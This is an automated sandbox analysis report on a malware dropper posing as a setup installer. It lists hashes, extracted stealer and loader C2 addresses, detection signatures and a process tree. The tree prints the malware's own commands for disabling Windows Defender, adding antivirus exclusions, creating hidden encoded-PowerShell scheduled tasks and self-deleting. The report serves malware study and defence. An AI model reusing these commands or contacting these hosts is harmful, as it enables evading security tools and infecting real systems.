Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
631s -
max time network
645s -
platform
windows10_x64 -
resource
win10-en -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
redline
janesam
65.108.20.195:6774
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
199qwe
185.215.113.104:18754
Extracted
icedid
3162718704
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3788 2080 rundll32.exe 2 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7200 2080 rundll32.exe 2 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8248 2080 rundll32.exe 2 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9064 2080 rundll32.exe 2 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral8/memory/492-239-0x0000000004A80000-0x0000000004A9D000-memory.dmp family_redline behavioral8/memory/4708-303-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral8/memory/4708-304-0x000000000041C5DA-mapping.dmp family_redline behavioral8/memory/2804-345-0x000000000041C5E2-mapping.dmp family_redline behavioral8/memory/3172-563-0x000000000041C5DE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral8/files/0x000400000001ab11-144.dat family_socelars behavioral8/files/0x000400000001ab11-173.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral8/memory/1952-224-0x0000000000A60000-0x0000000000B34000-memory.dmp family_vidar behavioral8/memory/1952-226-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral8/files/0x000400000001ab08-124.dat aspack_v212_v242 behavioral8/files/0x000400000001ab0a-131.dat aspack_v212_v242 behavioral8/files/0x000400000001ab0a-132.dat aspack_v212_v242 behavioral8/files/0x000400000001ab08-128.dat aspack_v212_v242 behavioral8/files/0x000400000001ab07-126.dat aspack_v212_v242 behavioral8/files/0x000400000001ab07-125.dat aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 496 setup_installer.exe 888 setup_install.exe 2728 Sun193fda712d9f1.exe 2672 Sun1917b8fb5f09db8.exe 3820 Sun19e4ade31b2a.exe 3080 Sun19262b9e49ad.exe 1780 Sun1908b94df837b3158.exe 3576 Sun191101c1aaa.exe 3216 Sun19de8ff4b6aefeb8.exe 1488 Sun198361825f4.exe 1952 Sun19eb40faaaa9.exe 2664 Sun1905815e51282417.exe 492 Sun195a1614ec24e6a.exe 3728 Sun1966fb31dd5a07.exe 4140 Sun1966fb31dd5a07.tmp 4512 tbdcivg -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 7 IoCs
pid Process 888 setup_install.exe 888 setup_install.exe 888 setup_install.exe 888 setup_install.exe 888 setup_install.exe 888 setup_install.exe 4140 Sun1966fb31dd5a07.tmp -
resource yara_rule behavioral8/files/0x000200000001ab47-271.dat themida behavioral8/files/0x000200000001ab47-290.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 107 ip-api.com 220 ipinfo.io 222 ipinfo.io 394 ipinfo.io 395 ipinfo.io 9 ip-api.com 105 ipinfo.io 106 ipinfo.io -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 5024 3216 WerFault.exe 85 2532 3216 WerFault.exe 85 3944 2004 WerFault.exe 116 4232 3216 WerFault.exe 85 5248 3216 WerFault.exe 85 5676 4876 WerFault.exe 119 5948 4876 WerFault.exe 119 6052 3216 WerFault.exe 85 6084 3608 WerFault.exe 114 1312 4876 WerFault.exe 119 5028 3216 WerFault.exe 85 5472 4876 WerFault.exe 119 4476 4876 WerFault.exe 119 6008 5540 WerFault.exe 132 6132 4876 WerFault.exe 119 2324 4876 WerFault.exe 119 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7940 schtasks.exe 7792 schtasks.exe 8876 schtasks.exe 7712 schtasks.exe 5168 schtasks.exe 4740 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 5296 timeout.exe 1744 timeout.exe 8928 timeout.exe 8092 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 480 taskkill.exe 5432 taskkill.exe 5920 taskkill.exe 8184 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2316 powershell.exe 2316 powershell.exe 1780 Sun1908b94df837b3158.exe 1780 Sun1908b94df837b3158.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 3080 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 3080 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 3080 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 3080 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 3080 Sun19262b9e49ad.exe Token: SeTcbPrivilege 3080 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 3080 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 3080 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 3080 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 3080 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 3080 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 3080 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 3080 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 3080 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 3080 Sun19262b9e49ad.exe Token: SeBackupPrivilege 3080 Sun19262b9e49ad.exe Token: SeRestorePrivilege 3080 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 3080 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3080 Sun19262b9e49ad.exe Token: SeAuditPrivilege 3080 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 3080 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 3080 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 3080 Sun19262b9e49ad.exe Token: SeUndockPrivilege 3080 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 3080 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 3080 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 3080 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 3080 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 3080 Sun19262b9e49ad.exe Token: 31 3080 Sun19262b9e49ad.exe Token: 32 3080 Sun19262b9e49ad.exe Token: 33 3080 Sun19262b9e49ad.exe Token: 34 3080 Sun19262b9e49ad.exe Token: 35 3080 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3576 Sun191101c1aaa.exe Token: SeDebugPrivilege 3820 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 492 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 1488 Sun198361825f4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2844 wrote to memory of 496 2844 setup_x86_x64_install.exe 69 PID 2844 wrote to memory of 496 2844 setup_x86_x64_install.exe 69 PID 2844 wrote to memory of 496 2844 setup_x86_x64_install.exe 69 PID 496 wrote to memory of 888 496 setup_installer.exe 70 PID 496 wrote to memory of 888 496 setup_installer.exe 70 PID 496 wrote to memory of 888 496 setup_installer.exe 70 PID 888 wrote to memory of 1744 888 setup_install.exe 73 PID 888 wrote to memory of 1744 888 setup_install.exe 73 PID 888 wrote to memory of 1744 888 setup_install.exe 73 PID 888 wrote to memory of 3168 888 setup_install.exe 74 PID 888 wrote to memory of 3168 888 setup_install.exe 74 PID 888 wrote to memory of 3168 888 setup_install.exe 74 PID 888 wrote to memory of 2656 888 setup_install.exe 99 PID 888 wrote to memory of 2656 888 setup_install.exe 99 PID 888 wrote to memory of 2656 888 setup_install.exe 99 PID 888 wrote to memory of 2540 888 setup_install.exe 98 PID 888 wrote to memory of 2540 888 setup_install.exe 98 PID 888 wrote to memory of 2540 888 setup_install.exe 98 PID 888 wrote to memory of 2524 888 setup_install.exe 97 PID 888 wrote to memory of 2524 888 setup_install.exe 97 PID 888 wrote to memory of 2524 888 setup_install.exe 97 PID 888 wrote to memory of 1924 888 setup_install.exe 75 PID 888 wrote to memory of 1924 888 setup_install.exe 75 PID 888 wrote to memory of 1924 888 setup_install.exe 75 PID 888 wrote to memory of 2084 888 setup_install.exe 76 PID 888 wrote to memory of 2084 888 setup_install.exe 76 PID 888 wrote to memory of 2084 888 setup_install.exe 76 PID 888 wrote to memory of 2264 888 setup_install.exe 77 PID 888 wrote to memory of 2264 888 setup_install.exe 77 PID 888 wrote to memory of 2264 888 setup_install.exe 77 PID 1744 wrote to memory of 2316 1744 cmd.exe 78 PID 1744 wrote to memory of 2316 1744 cmd.exe 78 PID 1744 wrote to memory of 2316 1744 cmd.exe 78 PID 888 wrote to memory of 2496 888 setup_install.exe 79 PID 888 wrote to memory of 2496 888 setup_install.exe 79 PID 888 wrote to memory of 2496 888 setup_install.exe 79 PID 888 wrote to memory of 2604 888 setup_install.exe 80 PID 888 wrote to memory of 2604 888 setup_install.exe 80 PID 888 wrote to memory of 2604 888 setup_install.exe 80 PID 3168 wrote to memory of 2672 3168 cmd.exe 96 PID 3168 wrote to memory of 2672 3168 cmd.exe 96 PID 3168 wrote to memory of 2672 3168 cmd.exe 96 PID 2540 wrote to memory of 2728 2540 cmd.exe 81 PID 2540 wrote to memory of 2728 2540 cmd.exe 81 PID 888 wrote to memory of 3044 888 setup_install.exe 95 PID 888 wrote to memory of 3044 888 setup_install.exe 95 PID 888 wrote to memory of 3044 888 setup_install.exe 95 PID 2524 wrote to memory of 3820 2524 cmd.exe 94 PID 2524 wrote to memory of 3820 2524 cmd.exe 94 PID 888 wrote to memory of 3716 888 setup_install.exe 83 PID 888 wrote to memory of 3716 888 setup_install.exe 83 PID 888 wrote to memory of 3716 888 setup_install.exe 83 PID 2656 wrote to memory of 3080 2656 cmd.exe 93 PID 2656 wrote to memory of 3080 2656 cmd.exe 93 PID 2656 wrote to memory of 3080 2656 cmd.exe 93 PID 888 wrote to memory of 3612 888 setup_install.exe 82 PID 888 wrote to memory of 3612 888 setup_install.exe 82 PID 888 wrote to memory of 3612 888 setup_install.exe 82 PID 1924 wrote to memory of 1780 1924 cmd.exe 84 PID 1924 wrote to memory of 1780 1924 cmd.exe 84 PID 1924 wrote to memory of 1780 1924 cmd.exe 84 PID 2264 wrote to memory of 3576 2264 cmd.exe 92 PID 2264 wrote to memory of 3576 2264 cmd.exe 92 PID 2084 wrote to memory of 3216 2084 cmd.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
PID:2672 -
C:\Users\Admin\Documents\PslJczYjJlQpjUZyGbAAskGj.exe"C:\Users\Admin\Documents\PslJczYjJlQpjUZyGbAAskGj.exe"6⤵PID:5084
-
-
C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe"C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe"6⤵PID:4752
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im PDuiq4gmzLEiKPgxdmRSneVd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe" & del C:\ProgramData\*.dll & exit7⤵PID:368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im PDuiq4gmzLEiKPgxdmRSneVd.exe /f8⤵
- Kills process with taskkill
PID:8184
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:8092
-
-
-
-
C:\Users\Admin\Documents\p6JUYGrMnQGrQREFS3zS3pB5.exe"C:\Users\Admin\Documents\p6JUYGrMnQGrQREFS3zS3pB5.exe"6⤵PID:6052
-
-
C:\Users\Admin\Documents\Ogpnl9tl5rggipiaQh9ZC8Uf.exe"C:\Users\Admin\Documents\Ogpnl9tl5rggipiaQh9ZC8Uf.exe"6⤵PID:5008
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:992
-
C:\Users\Admin\Documents\5eklMaeiwiJ8qA0cSyvHdLam.exe"C:\Users\Admin\Documents\5eklMaeiwiJ8qA0cSyvHdLam.exe"8⤵PID:7264
-
-
C:\Users\Admin\Documents\1jSXHtRspEmImioXIR1Nsnt3.exe"C:\Users\Admin\Documents\1jSXHtRspEmImioXIR1Nsnt3.exe"8⤵PID:8384
-
C:\Users\Admin\AppData\Local\Temp\7zSD2B4.tmp\Install.exe.\Install.exe9⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\7zSD5F0.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:8668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:5460
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:8608
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:4852
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:8840
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:7352
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:7448
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:7336
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:8968
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:8660
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:5144
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:8664
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:8164
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDvRAYqwx" /SC once /ST 01:38:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:8876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDvRAYqwx"11⤵PID:6444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDvRAYqwx"11⤵PID:4836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:7712
-
-
-
-
-
C:\Users\Admin\Documents\dMQqggMBgWGB3nqixWwIZCYg.exe"C:\Users\Admin\Documents\dMQqggMBgWGB3nqixWwIZCYg.exe" /mixtwo8⤵PID:8412
-
-
C:\Users\Admin\Documents\Ag7A_AtihJ2nuLG7Is7w0TaX.exe"C:\Users\Admin\Documents\Ag7A_AtihJ2nuLG7Is7w0TaX.exe"8⤵PID:8568
-
-
C:\Users\Admin\Documents\2b5ESjxojUjgrf8pJ070uOyh.exe"C:\Users\Admin\Documents\2b5ESjxojUjgrf8pJ070uOyh.exe"8⤵PID:8960
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7792
-
-
-
C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe"C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe"6⤵PID:4804
-
C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exeC:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe7⤵PID:6408
-
-
C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exeC:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe7⤵PID:6524
-
-
-
C:\Users\Admin\Documents\kOeOtSt5c8Qw0FDcW4vfg0H3.exe"C:\Users\Admin\Documents\kOeOtSt5c8Qw0FDcW4vfg0H3.exe"6⤵PID:4516
-
-
C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe"C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe"6⤵PID:4996
-
C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exeC:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe7⤵PID:6568
-
-
C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exeC:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe7⤵PID:6688
-
-
-
C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"6⤵PID:3052
-
C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"7⤵PID:6912
-
-
-
C:\Users\Admin\Documents\5ySJqX_HHYl1iMiEZrkOBCIe.exe"C:\Users\Admin\Documents\5ySJqX_HHYl1iMiEZrkOBCIe.exe"6⤵PID:5572
-
-
C:\Users\Admin\Documents\mpiMFXwblm9P_5A83ELlLdp7.exe"C:\Users\Admin\Documents\mpiMFXwblm9P_5A83ELlLdp7.exe"6⤵PID:6020
-
-
C:\Users\Admin\Documents\ZtEbljXzgi682pr2t10pm91X.exe"C:\Users\Admin\Documents\ZtEbljXzgi682pr2t10pm91X.exe"6⤵PID:5240
-
-
C:\Users\Admin\Documents\O1SeI7RROXz89qLfm6i3dEdL.exe"C:\Users\Admin\Documents\O1SeI7RROXz89qLfm6i3dEdL.exe"6⤵PID:6188
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:1848
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:6108
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:5156
-
-
-
C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe"C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe"6⤵PID:6264
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rbcFPFwtfjtRdNsYtQOaAmG6.exe" /f & erase "C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe" & exit7⤵PID:6980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rbcFPFwtfjtRdNsYtQOaAmG6.exe" /f8⤵
- Kills process with taskkill
PID:5920
-
-
-
-
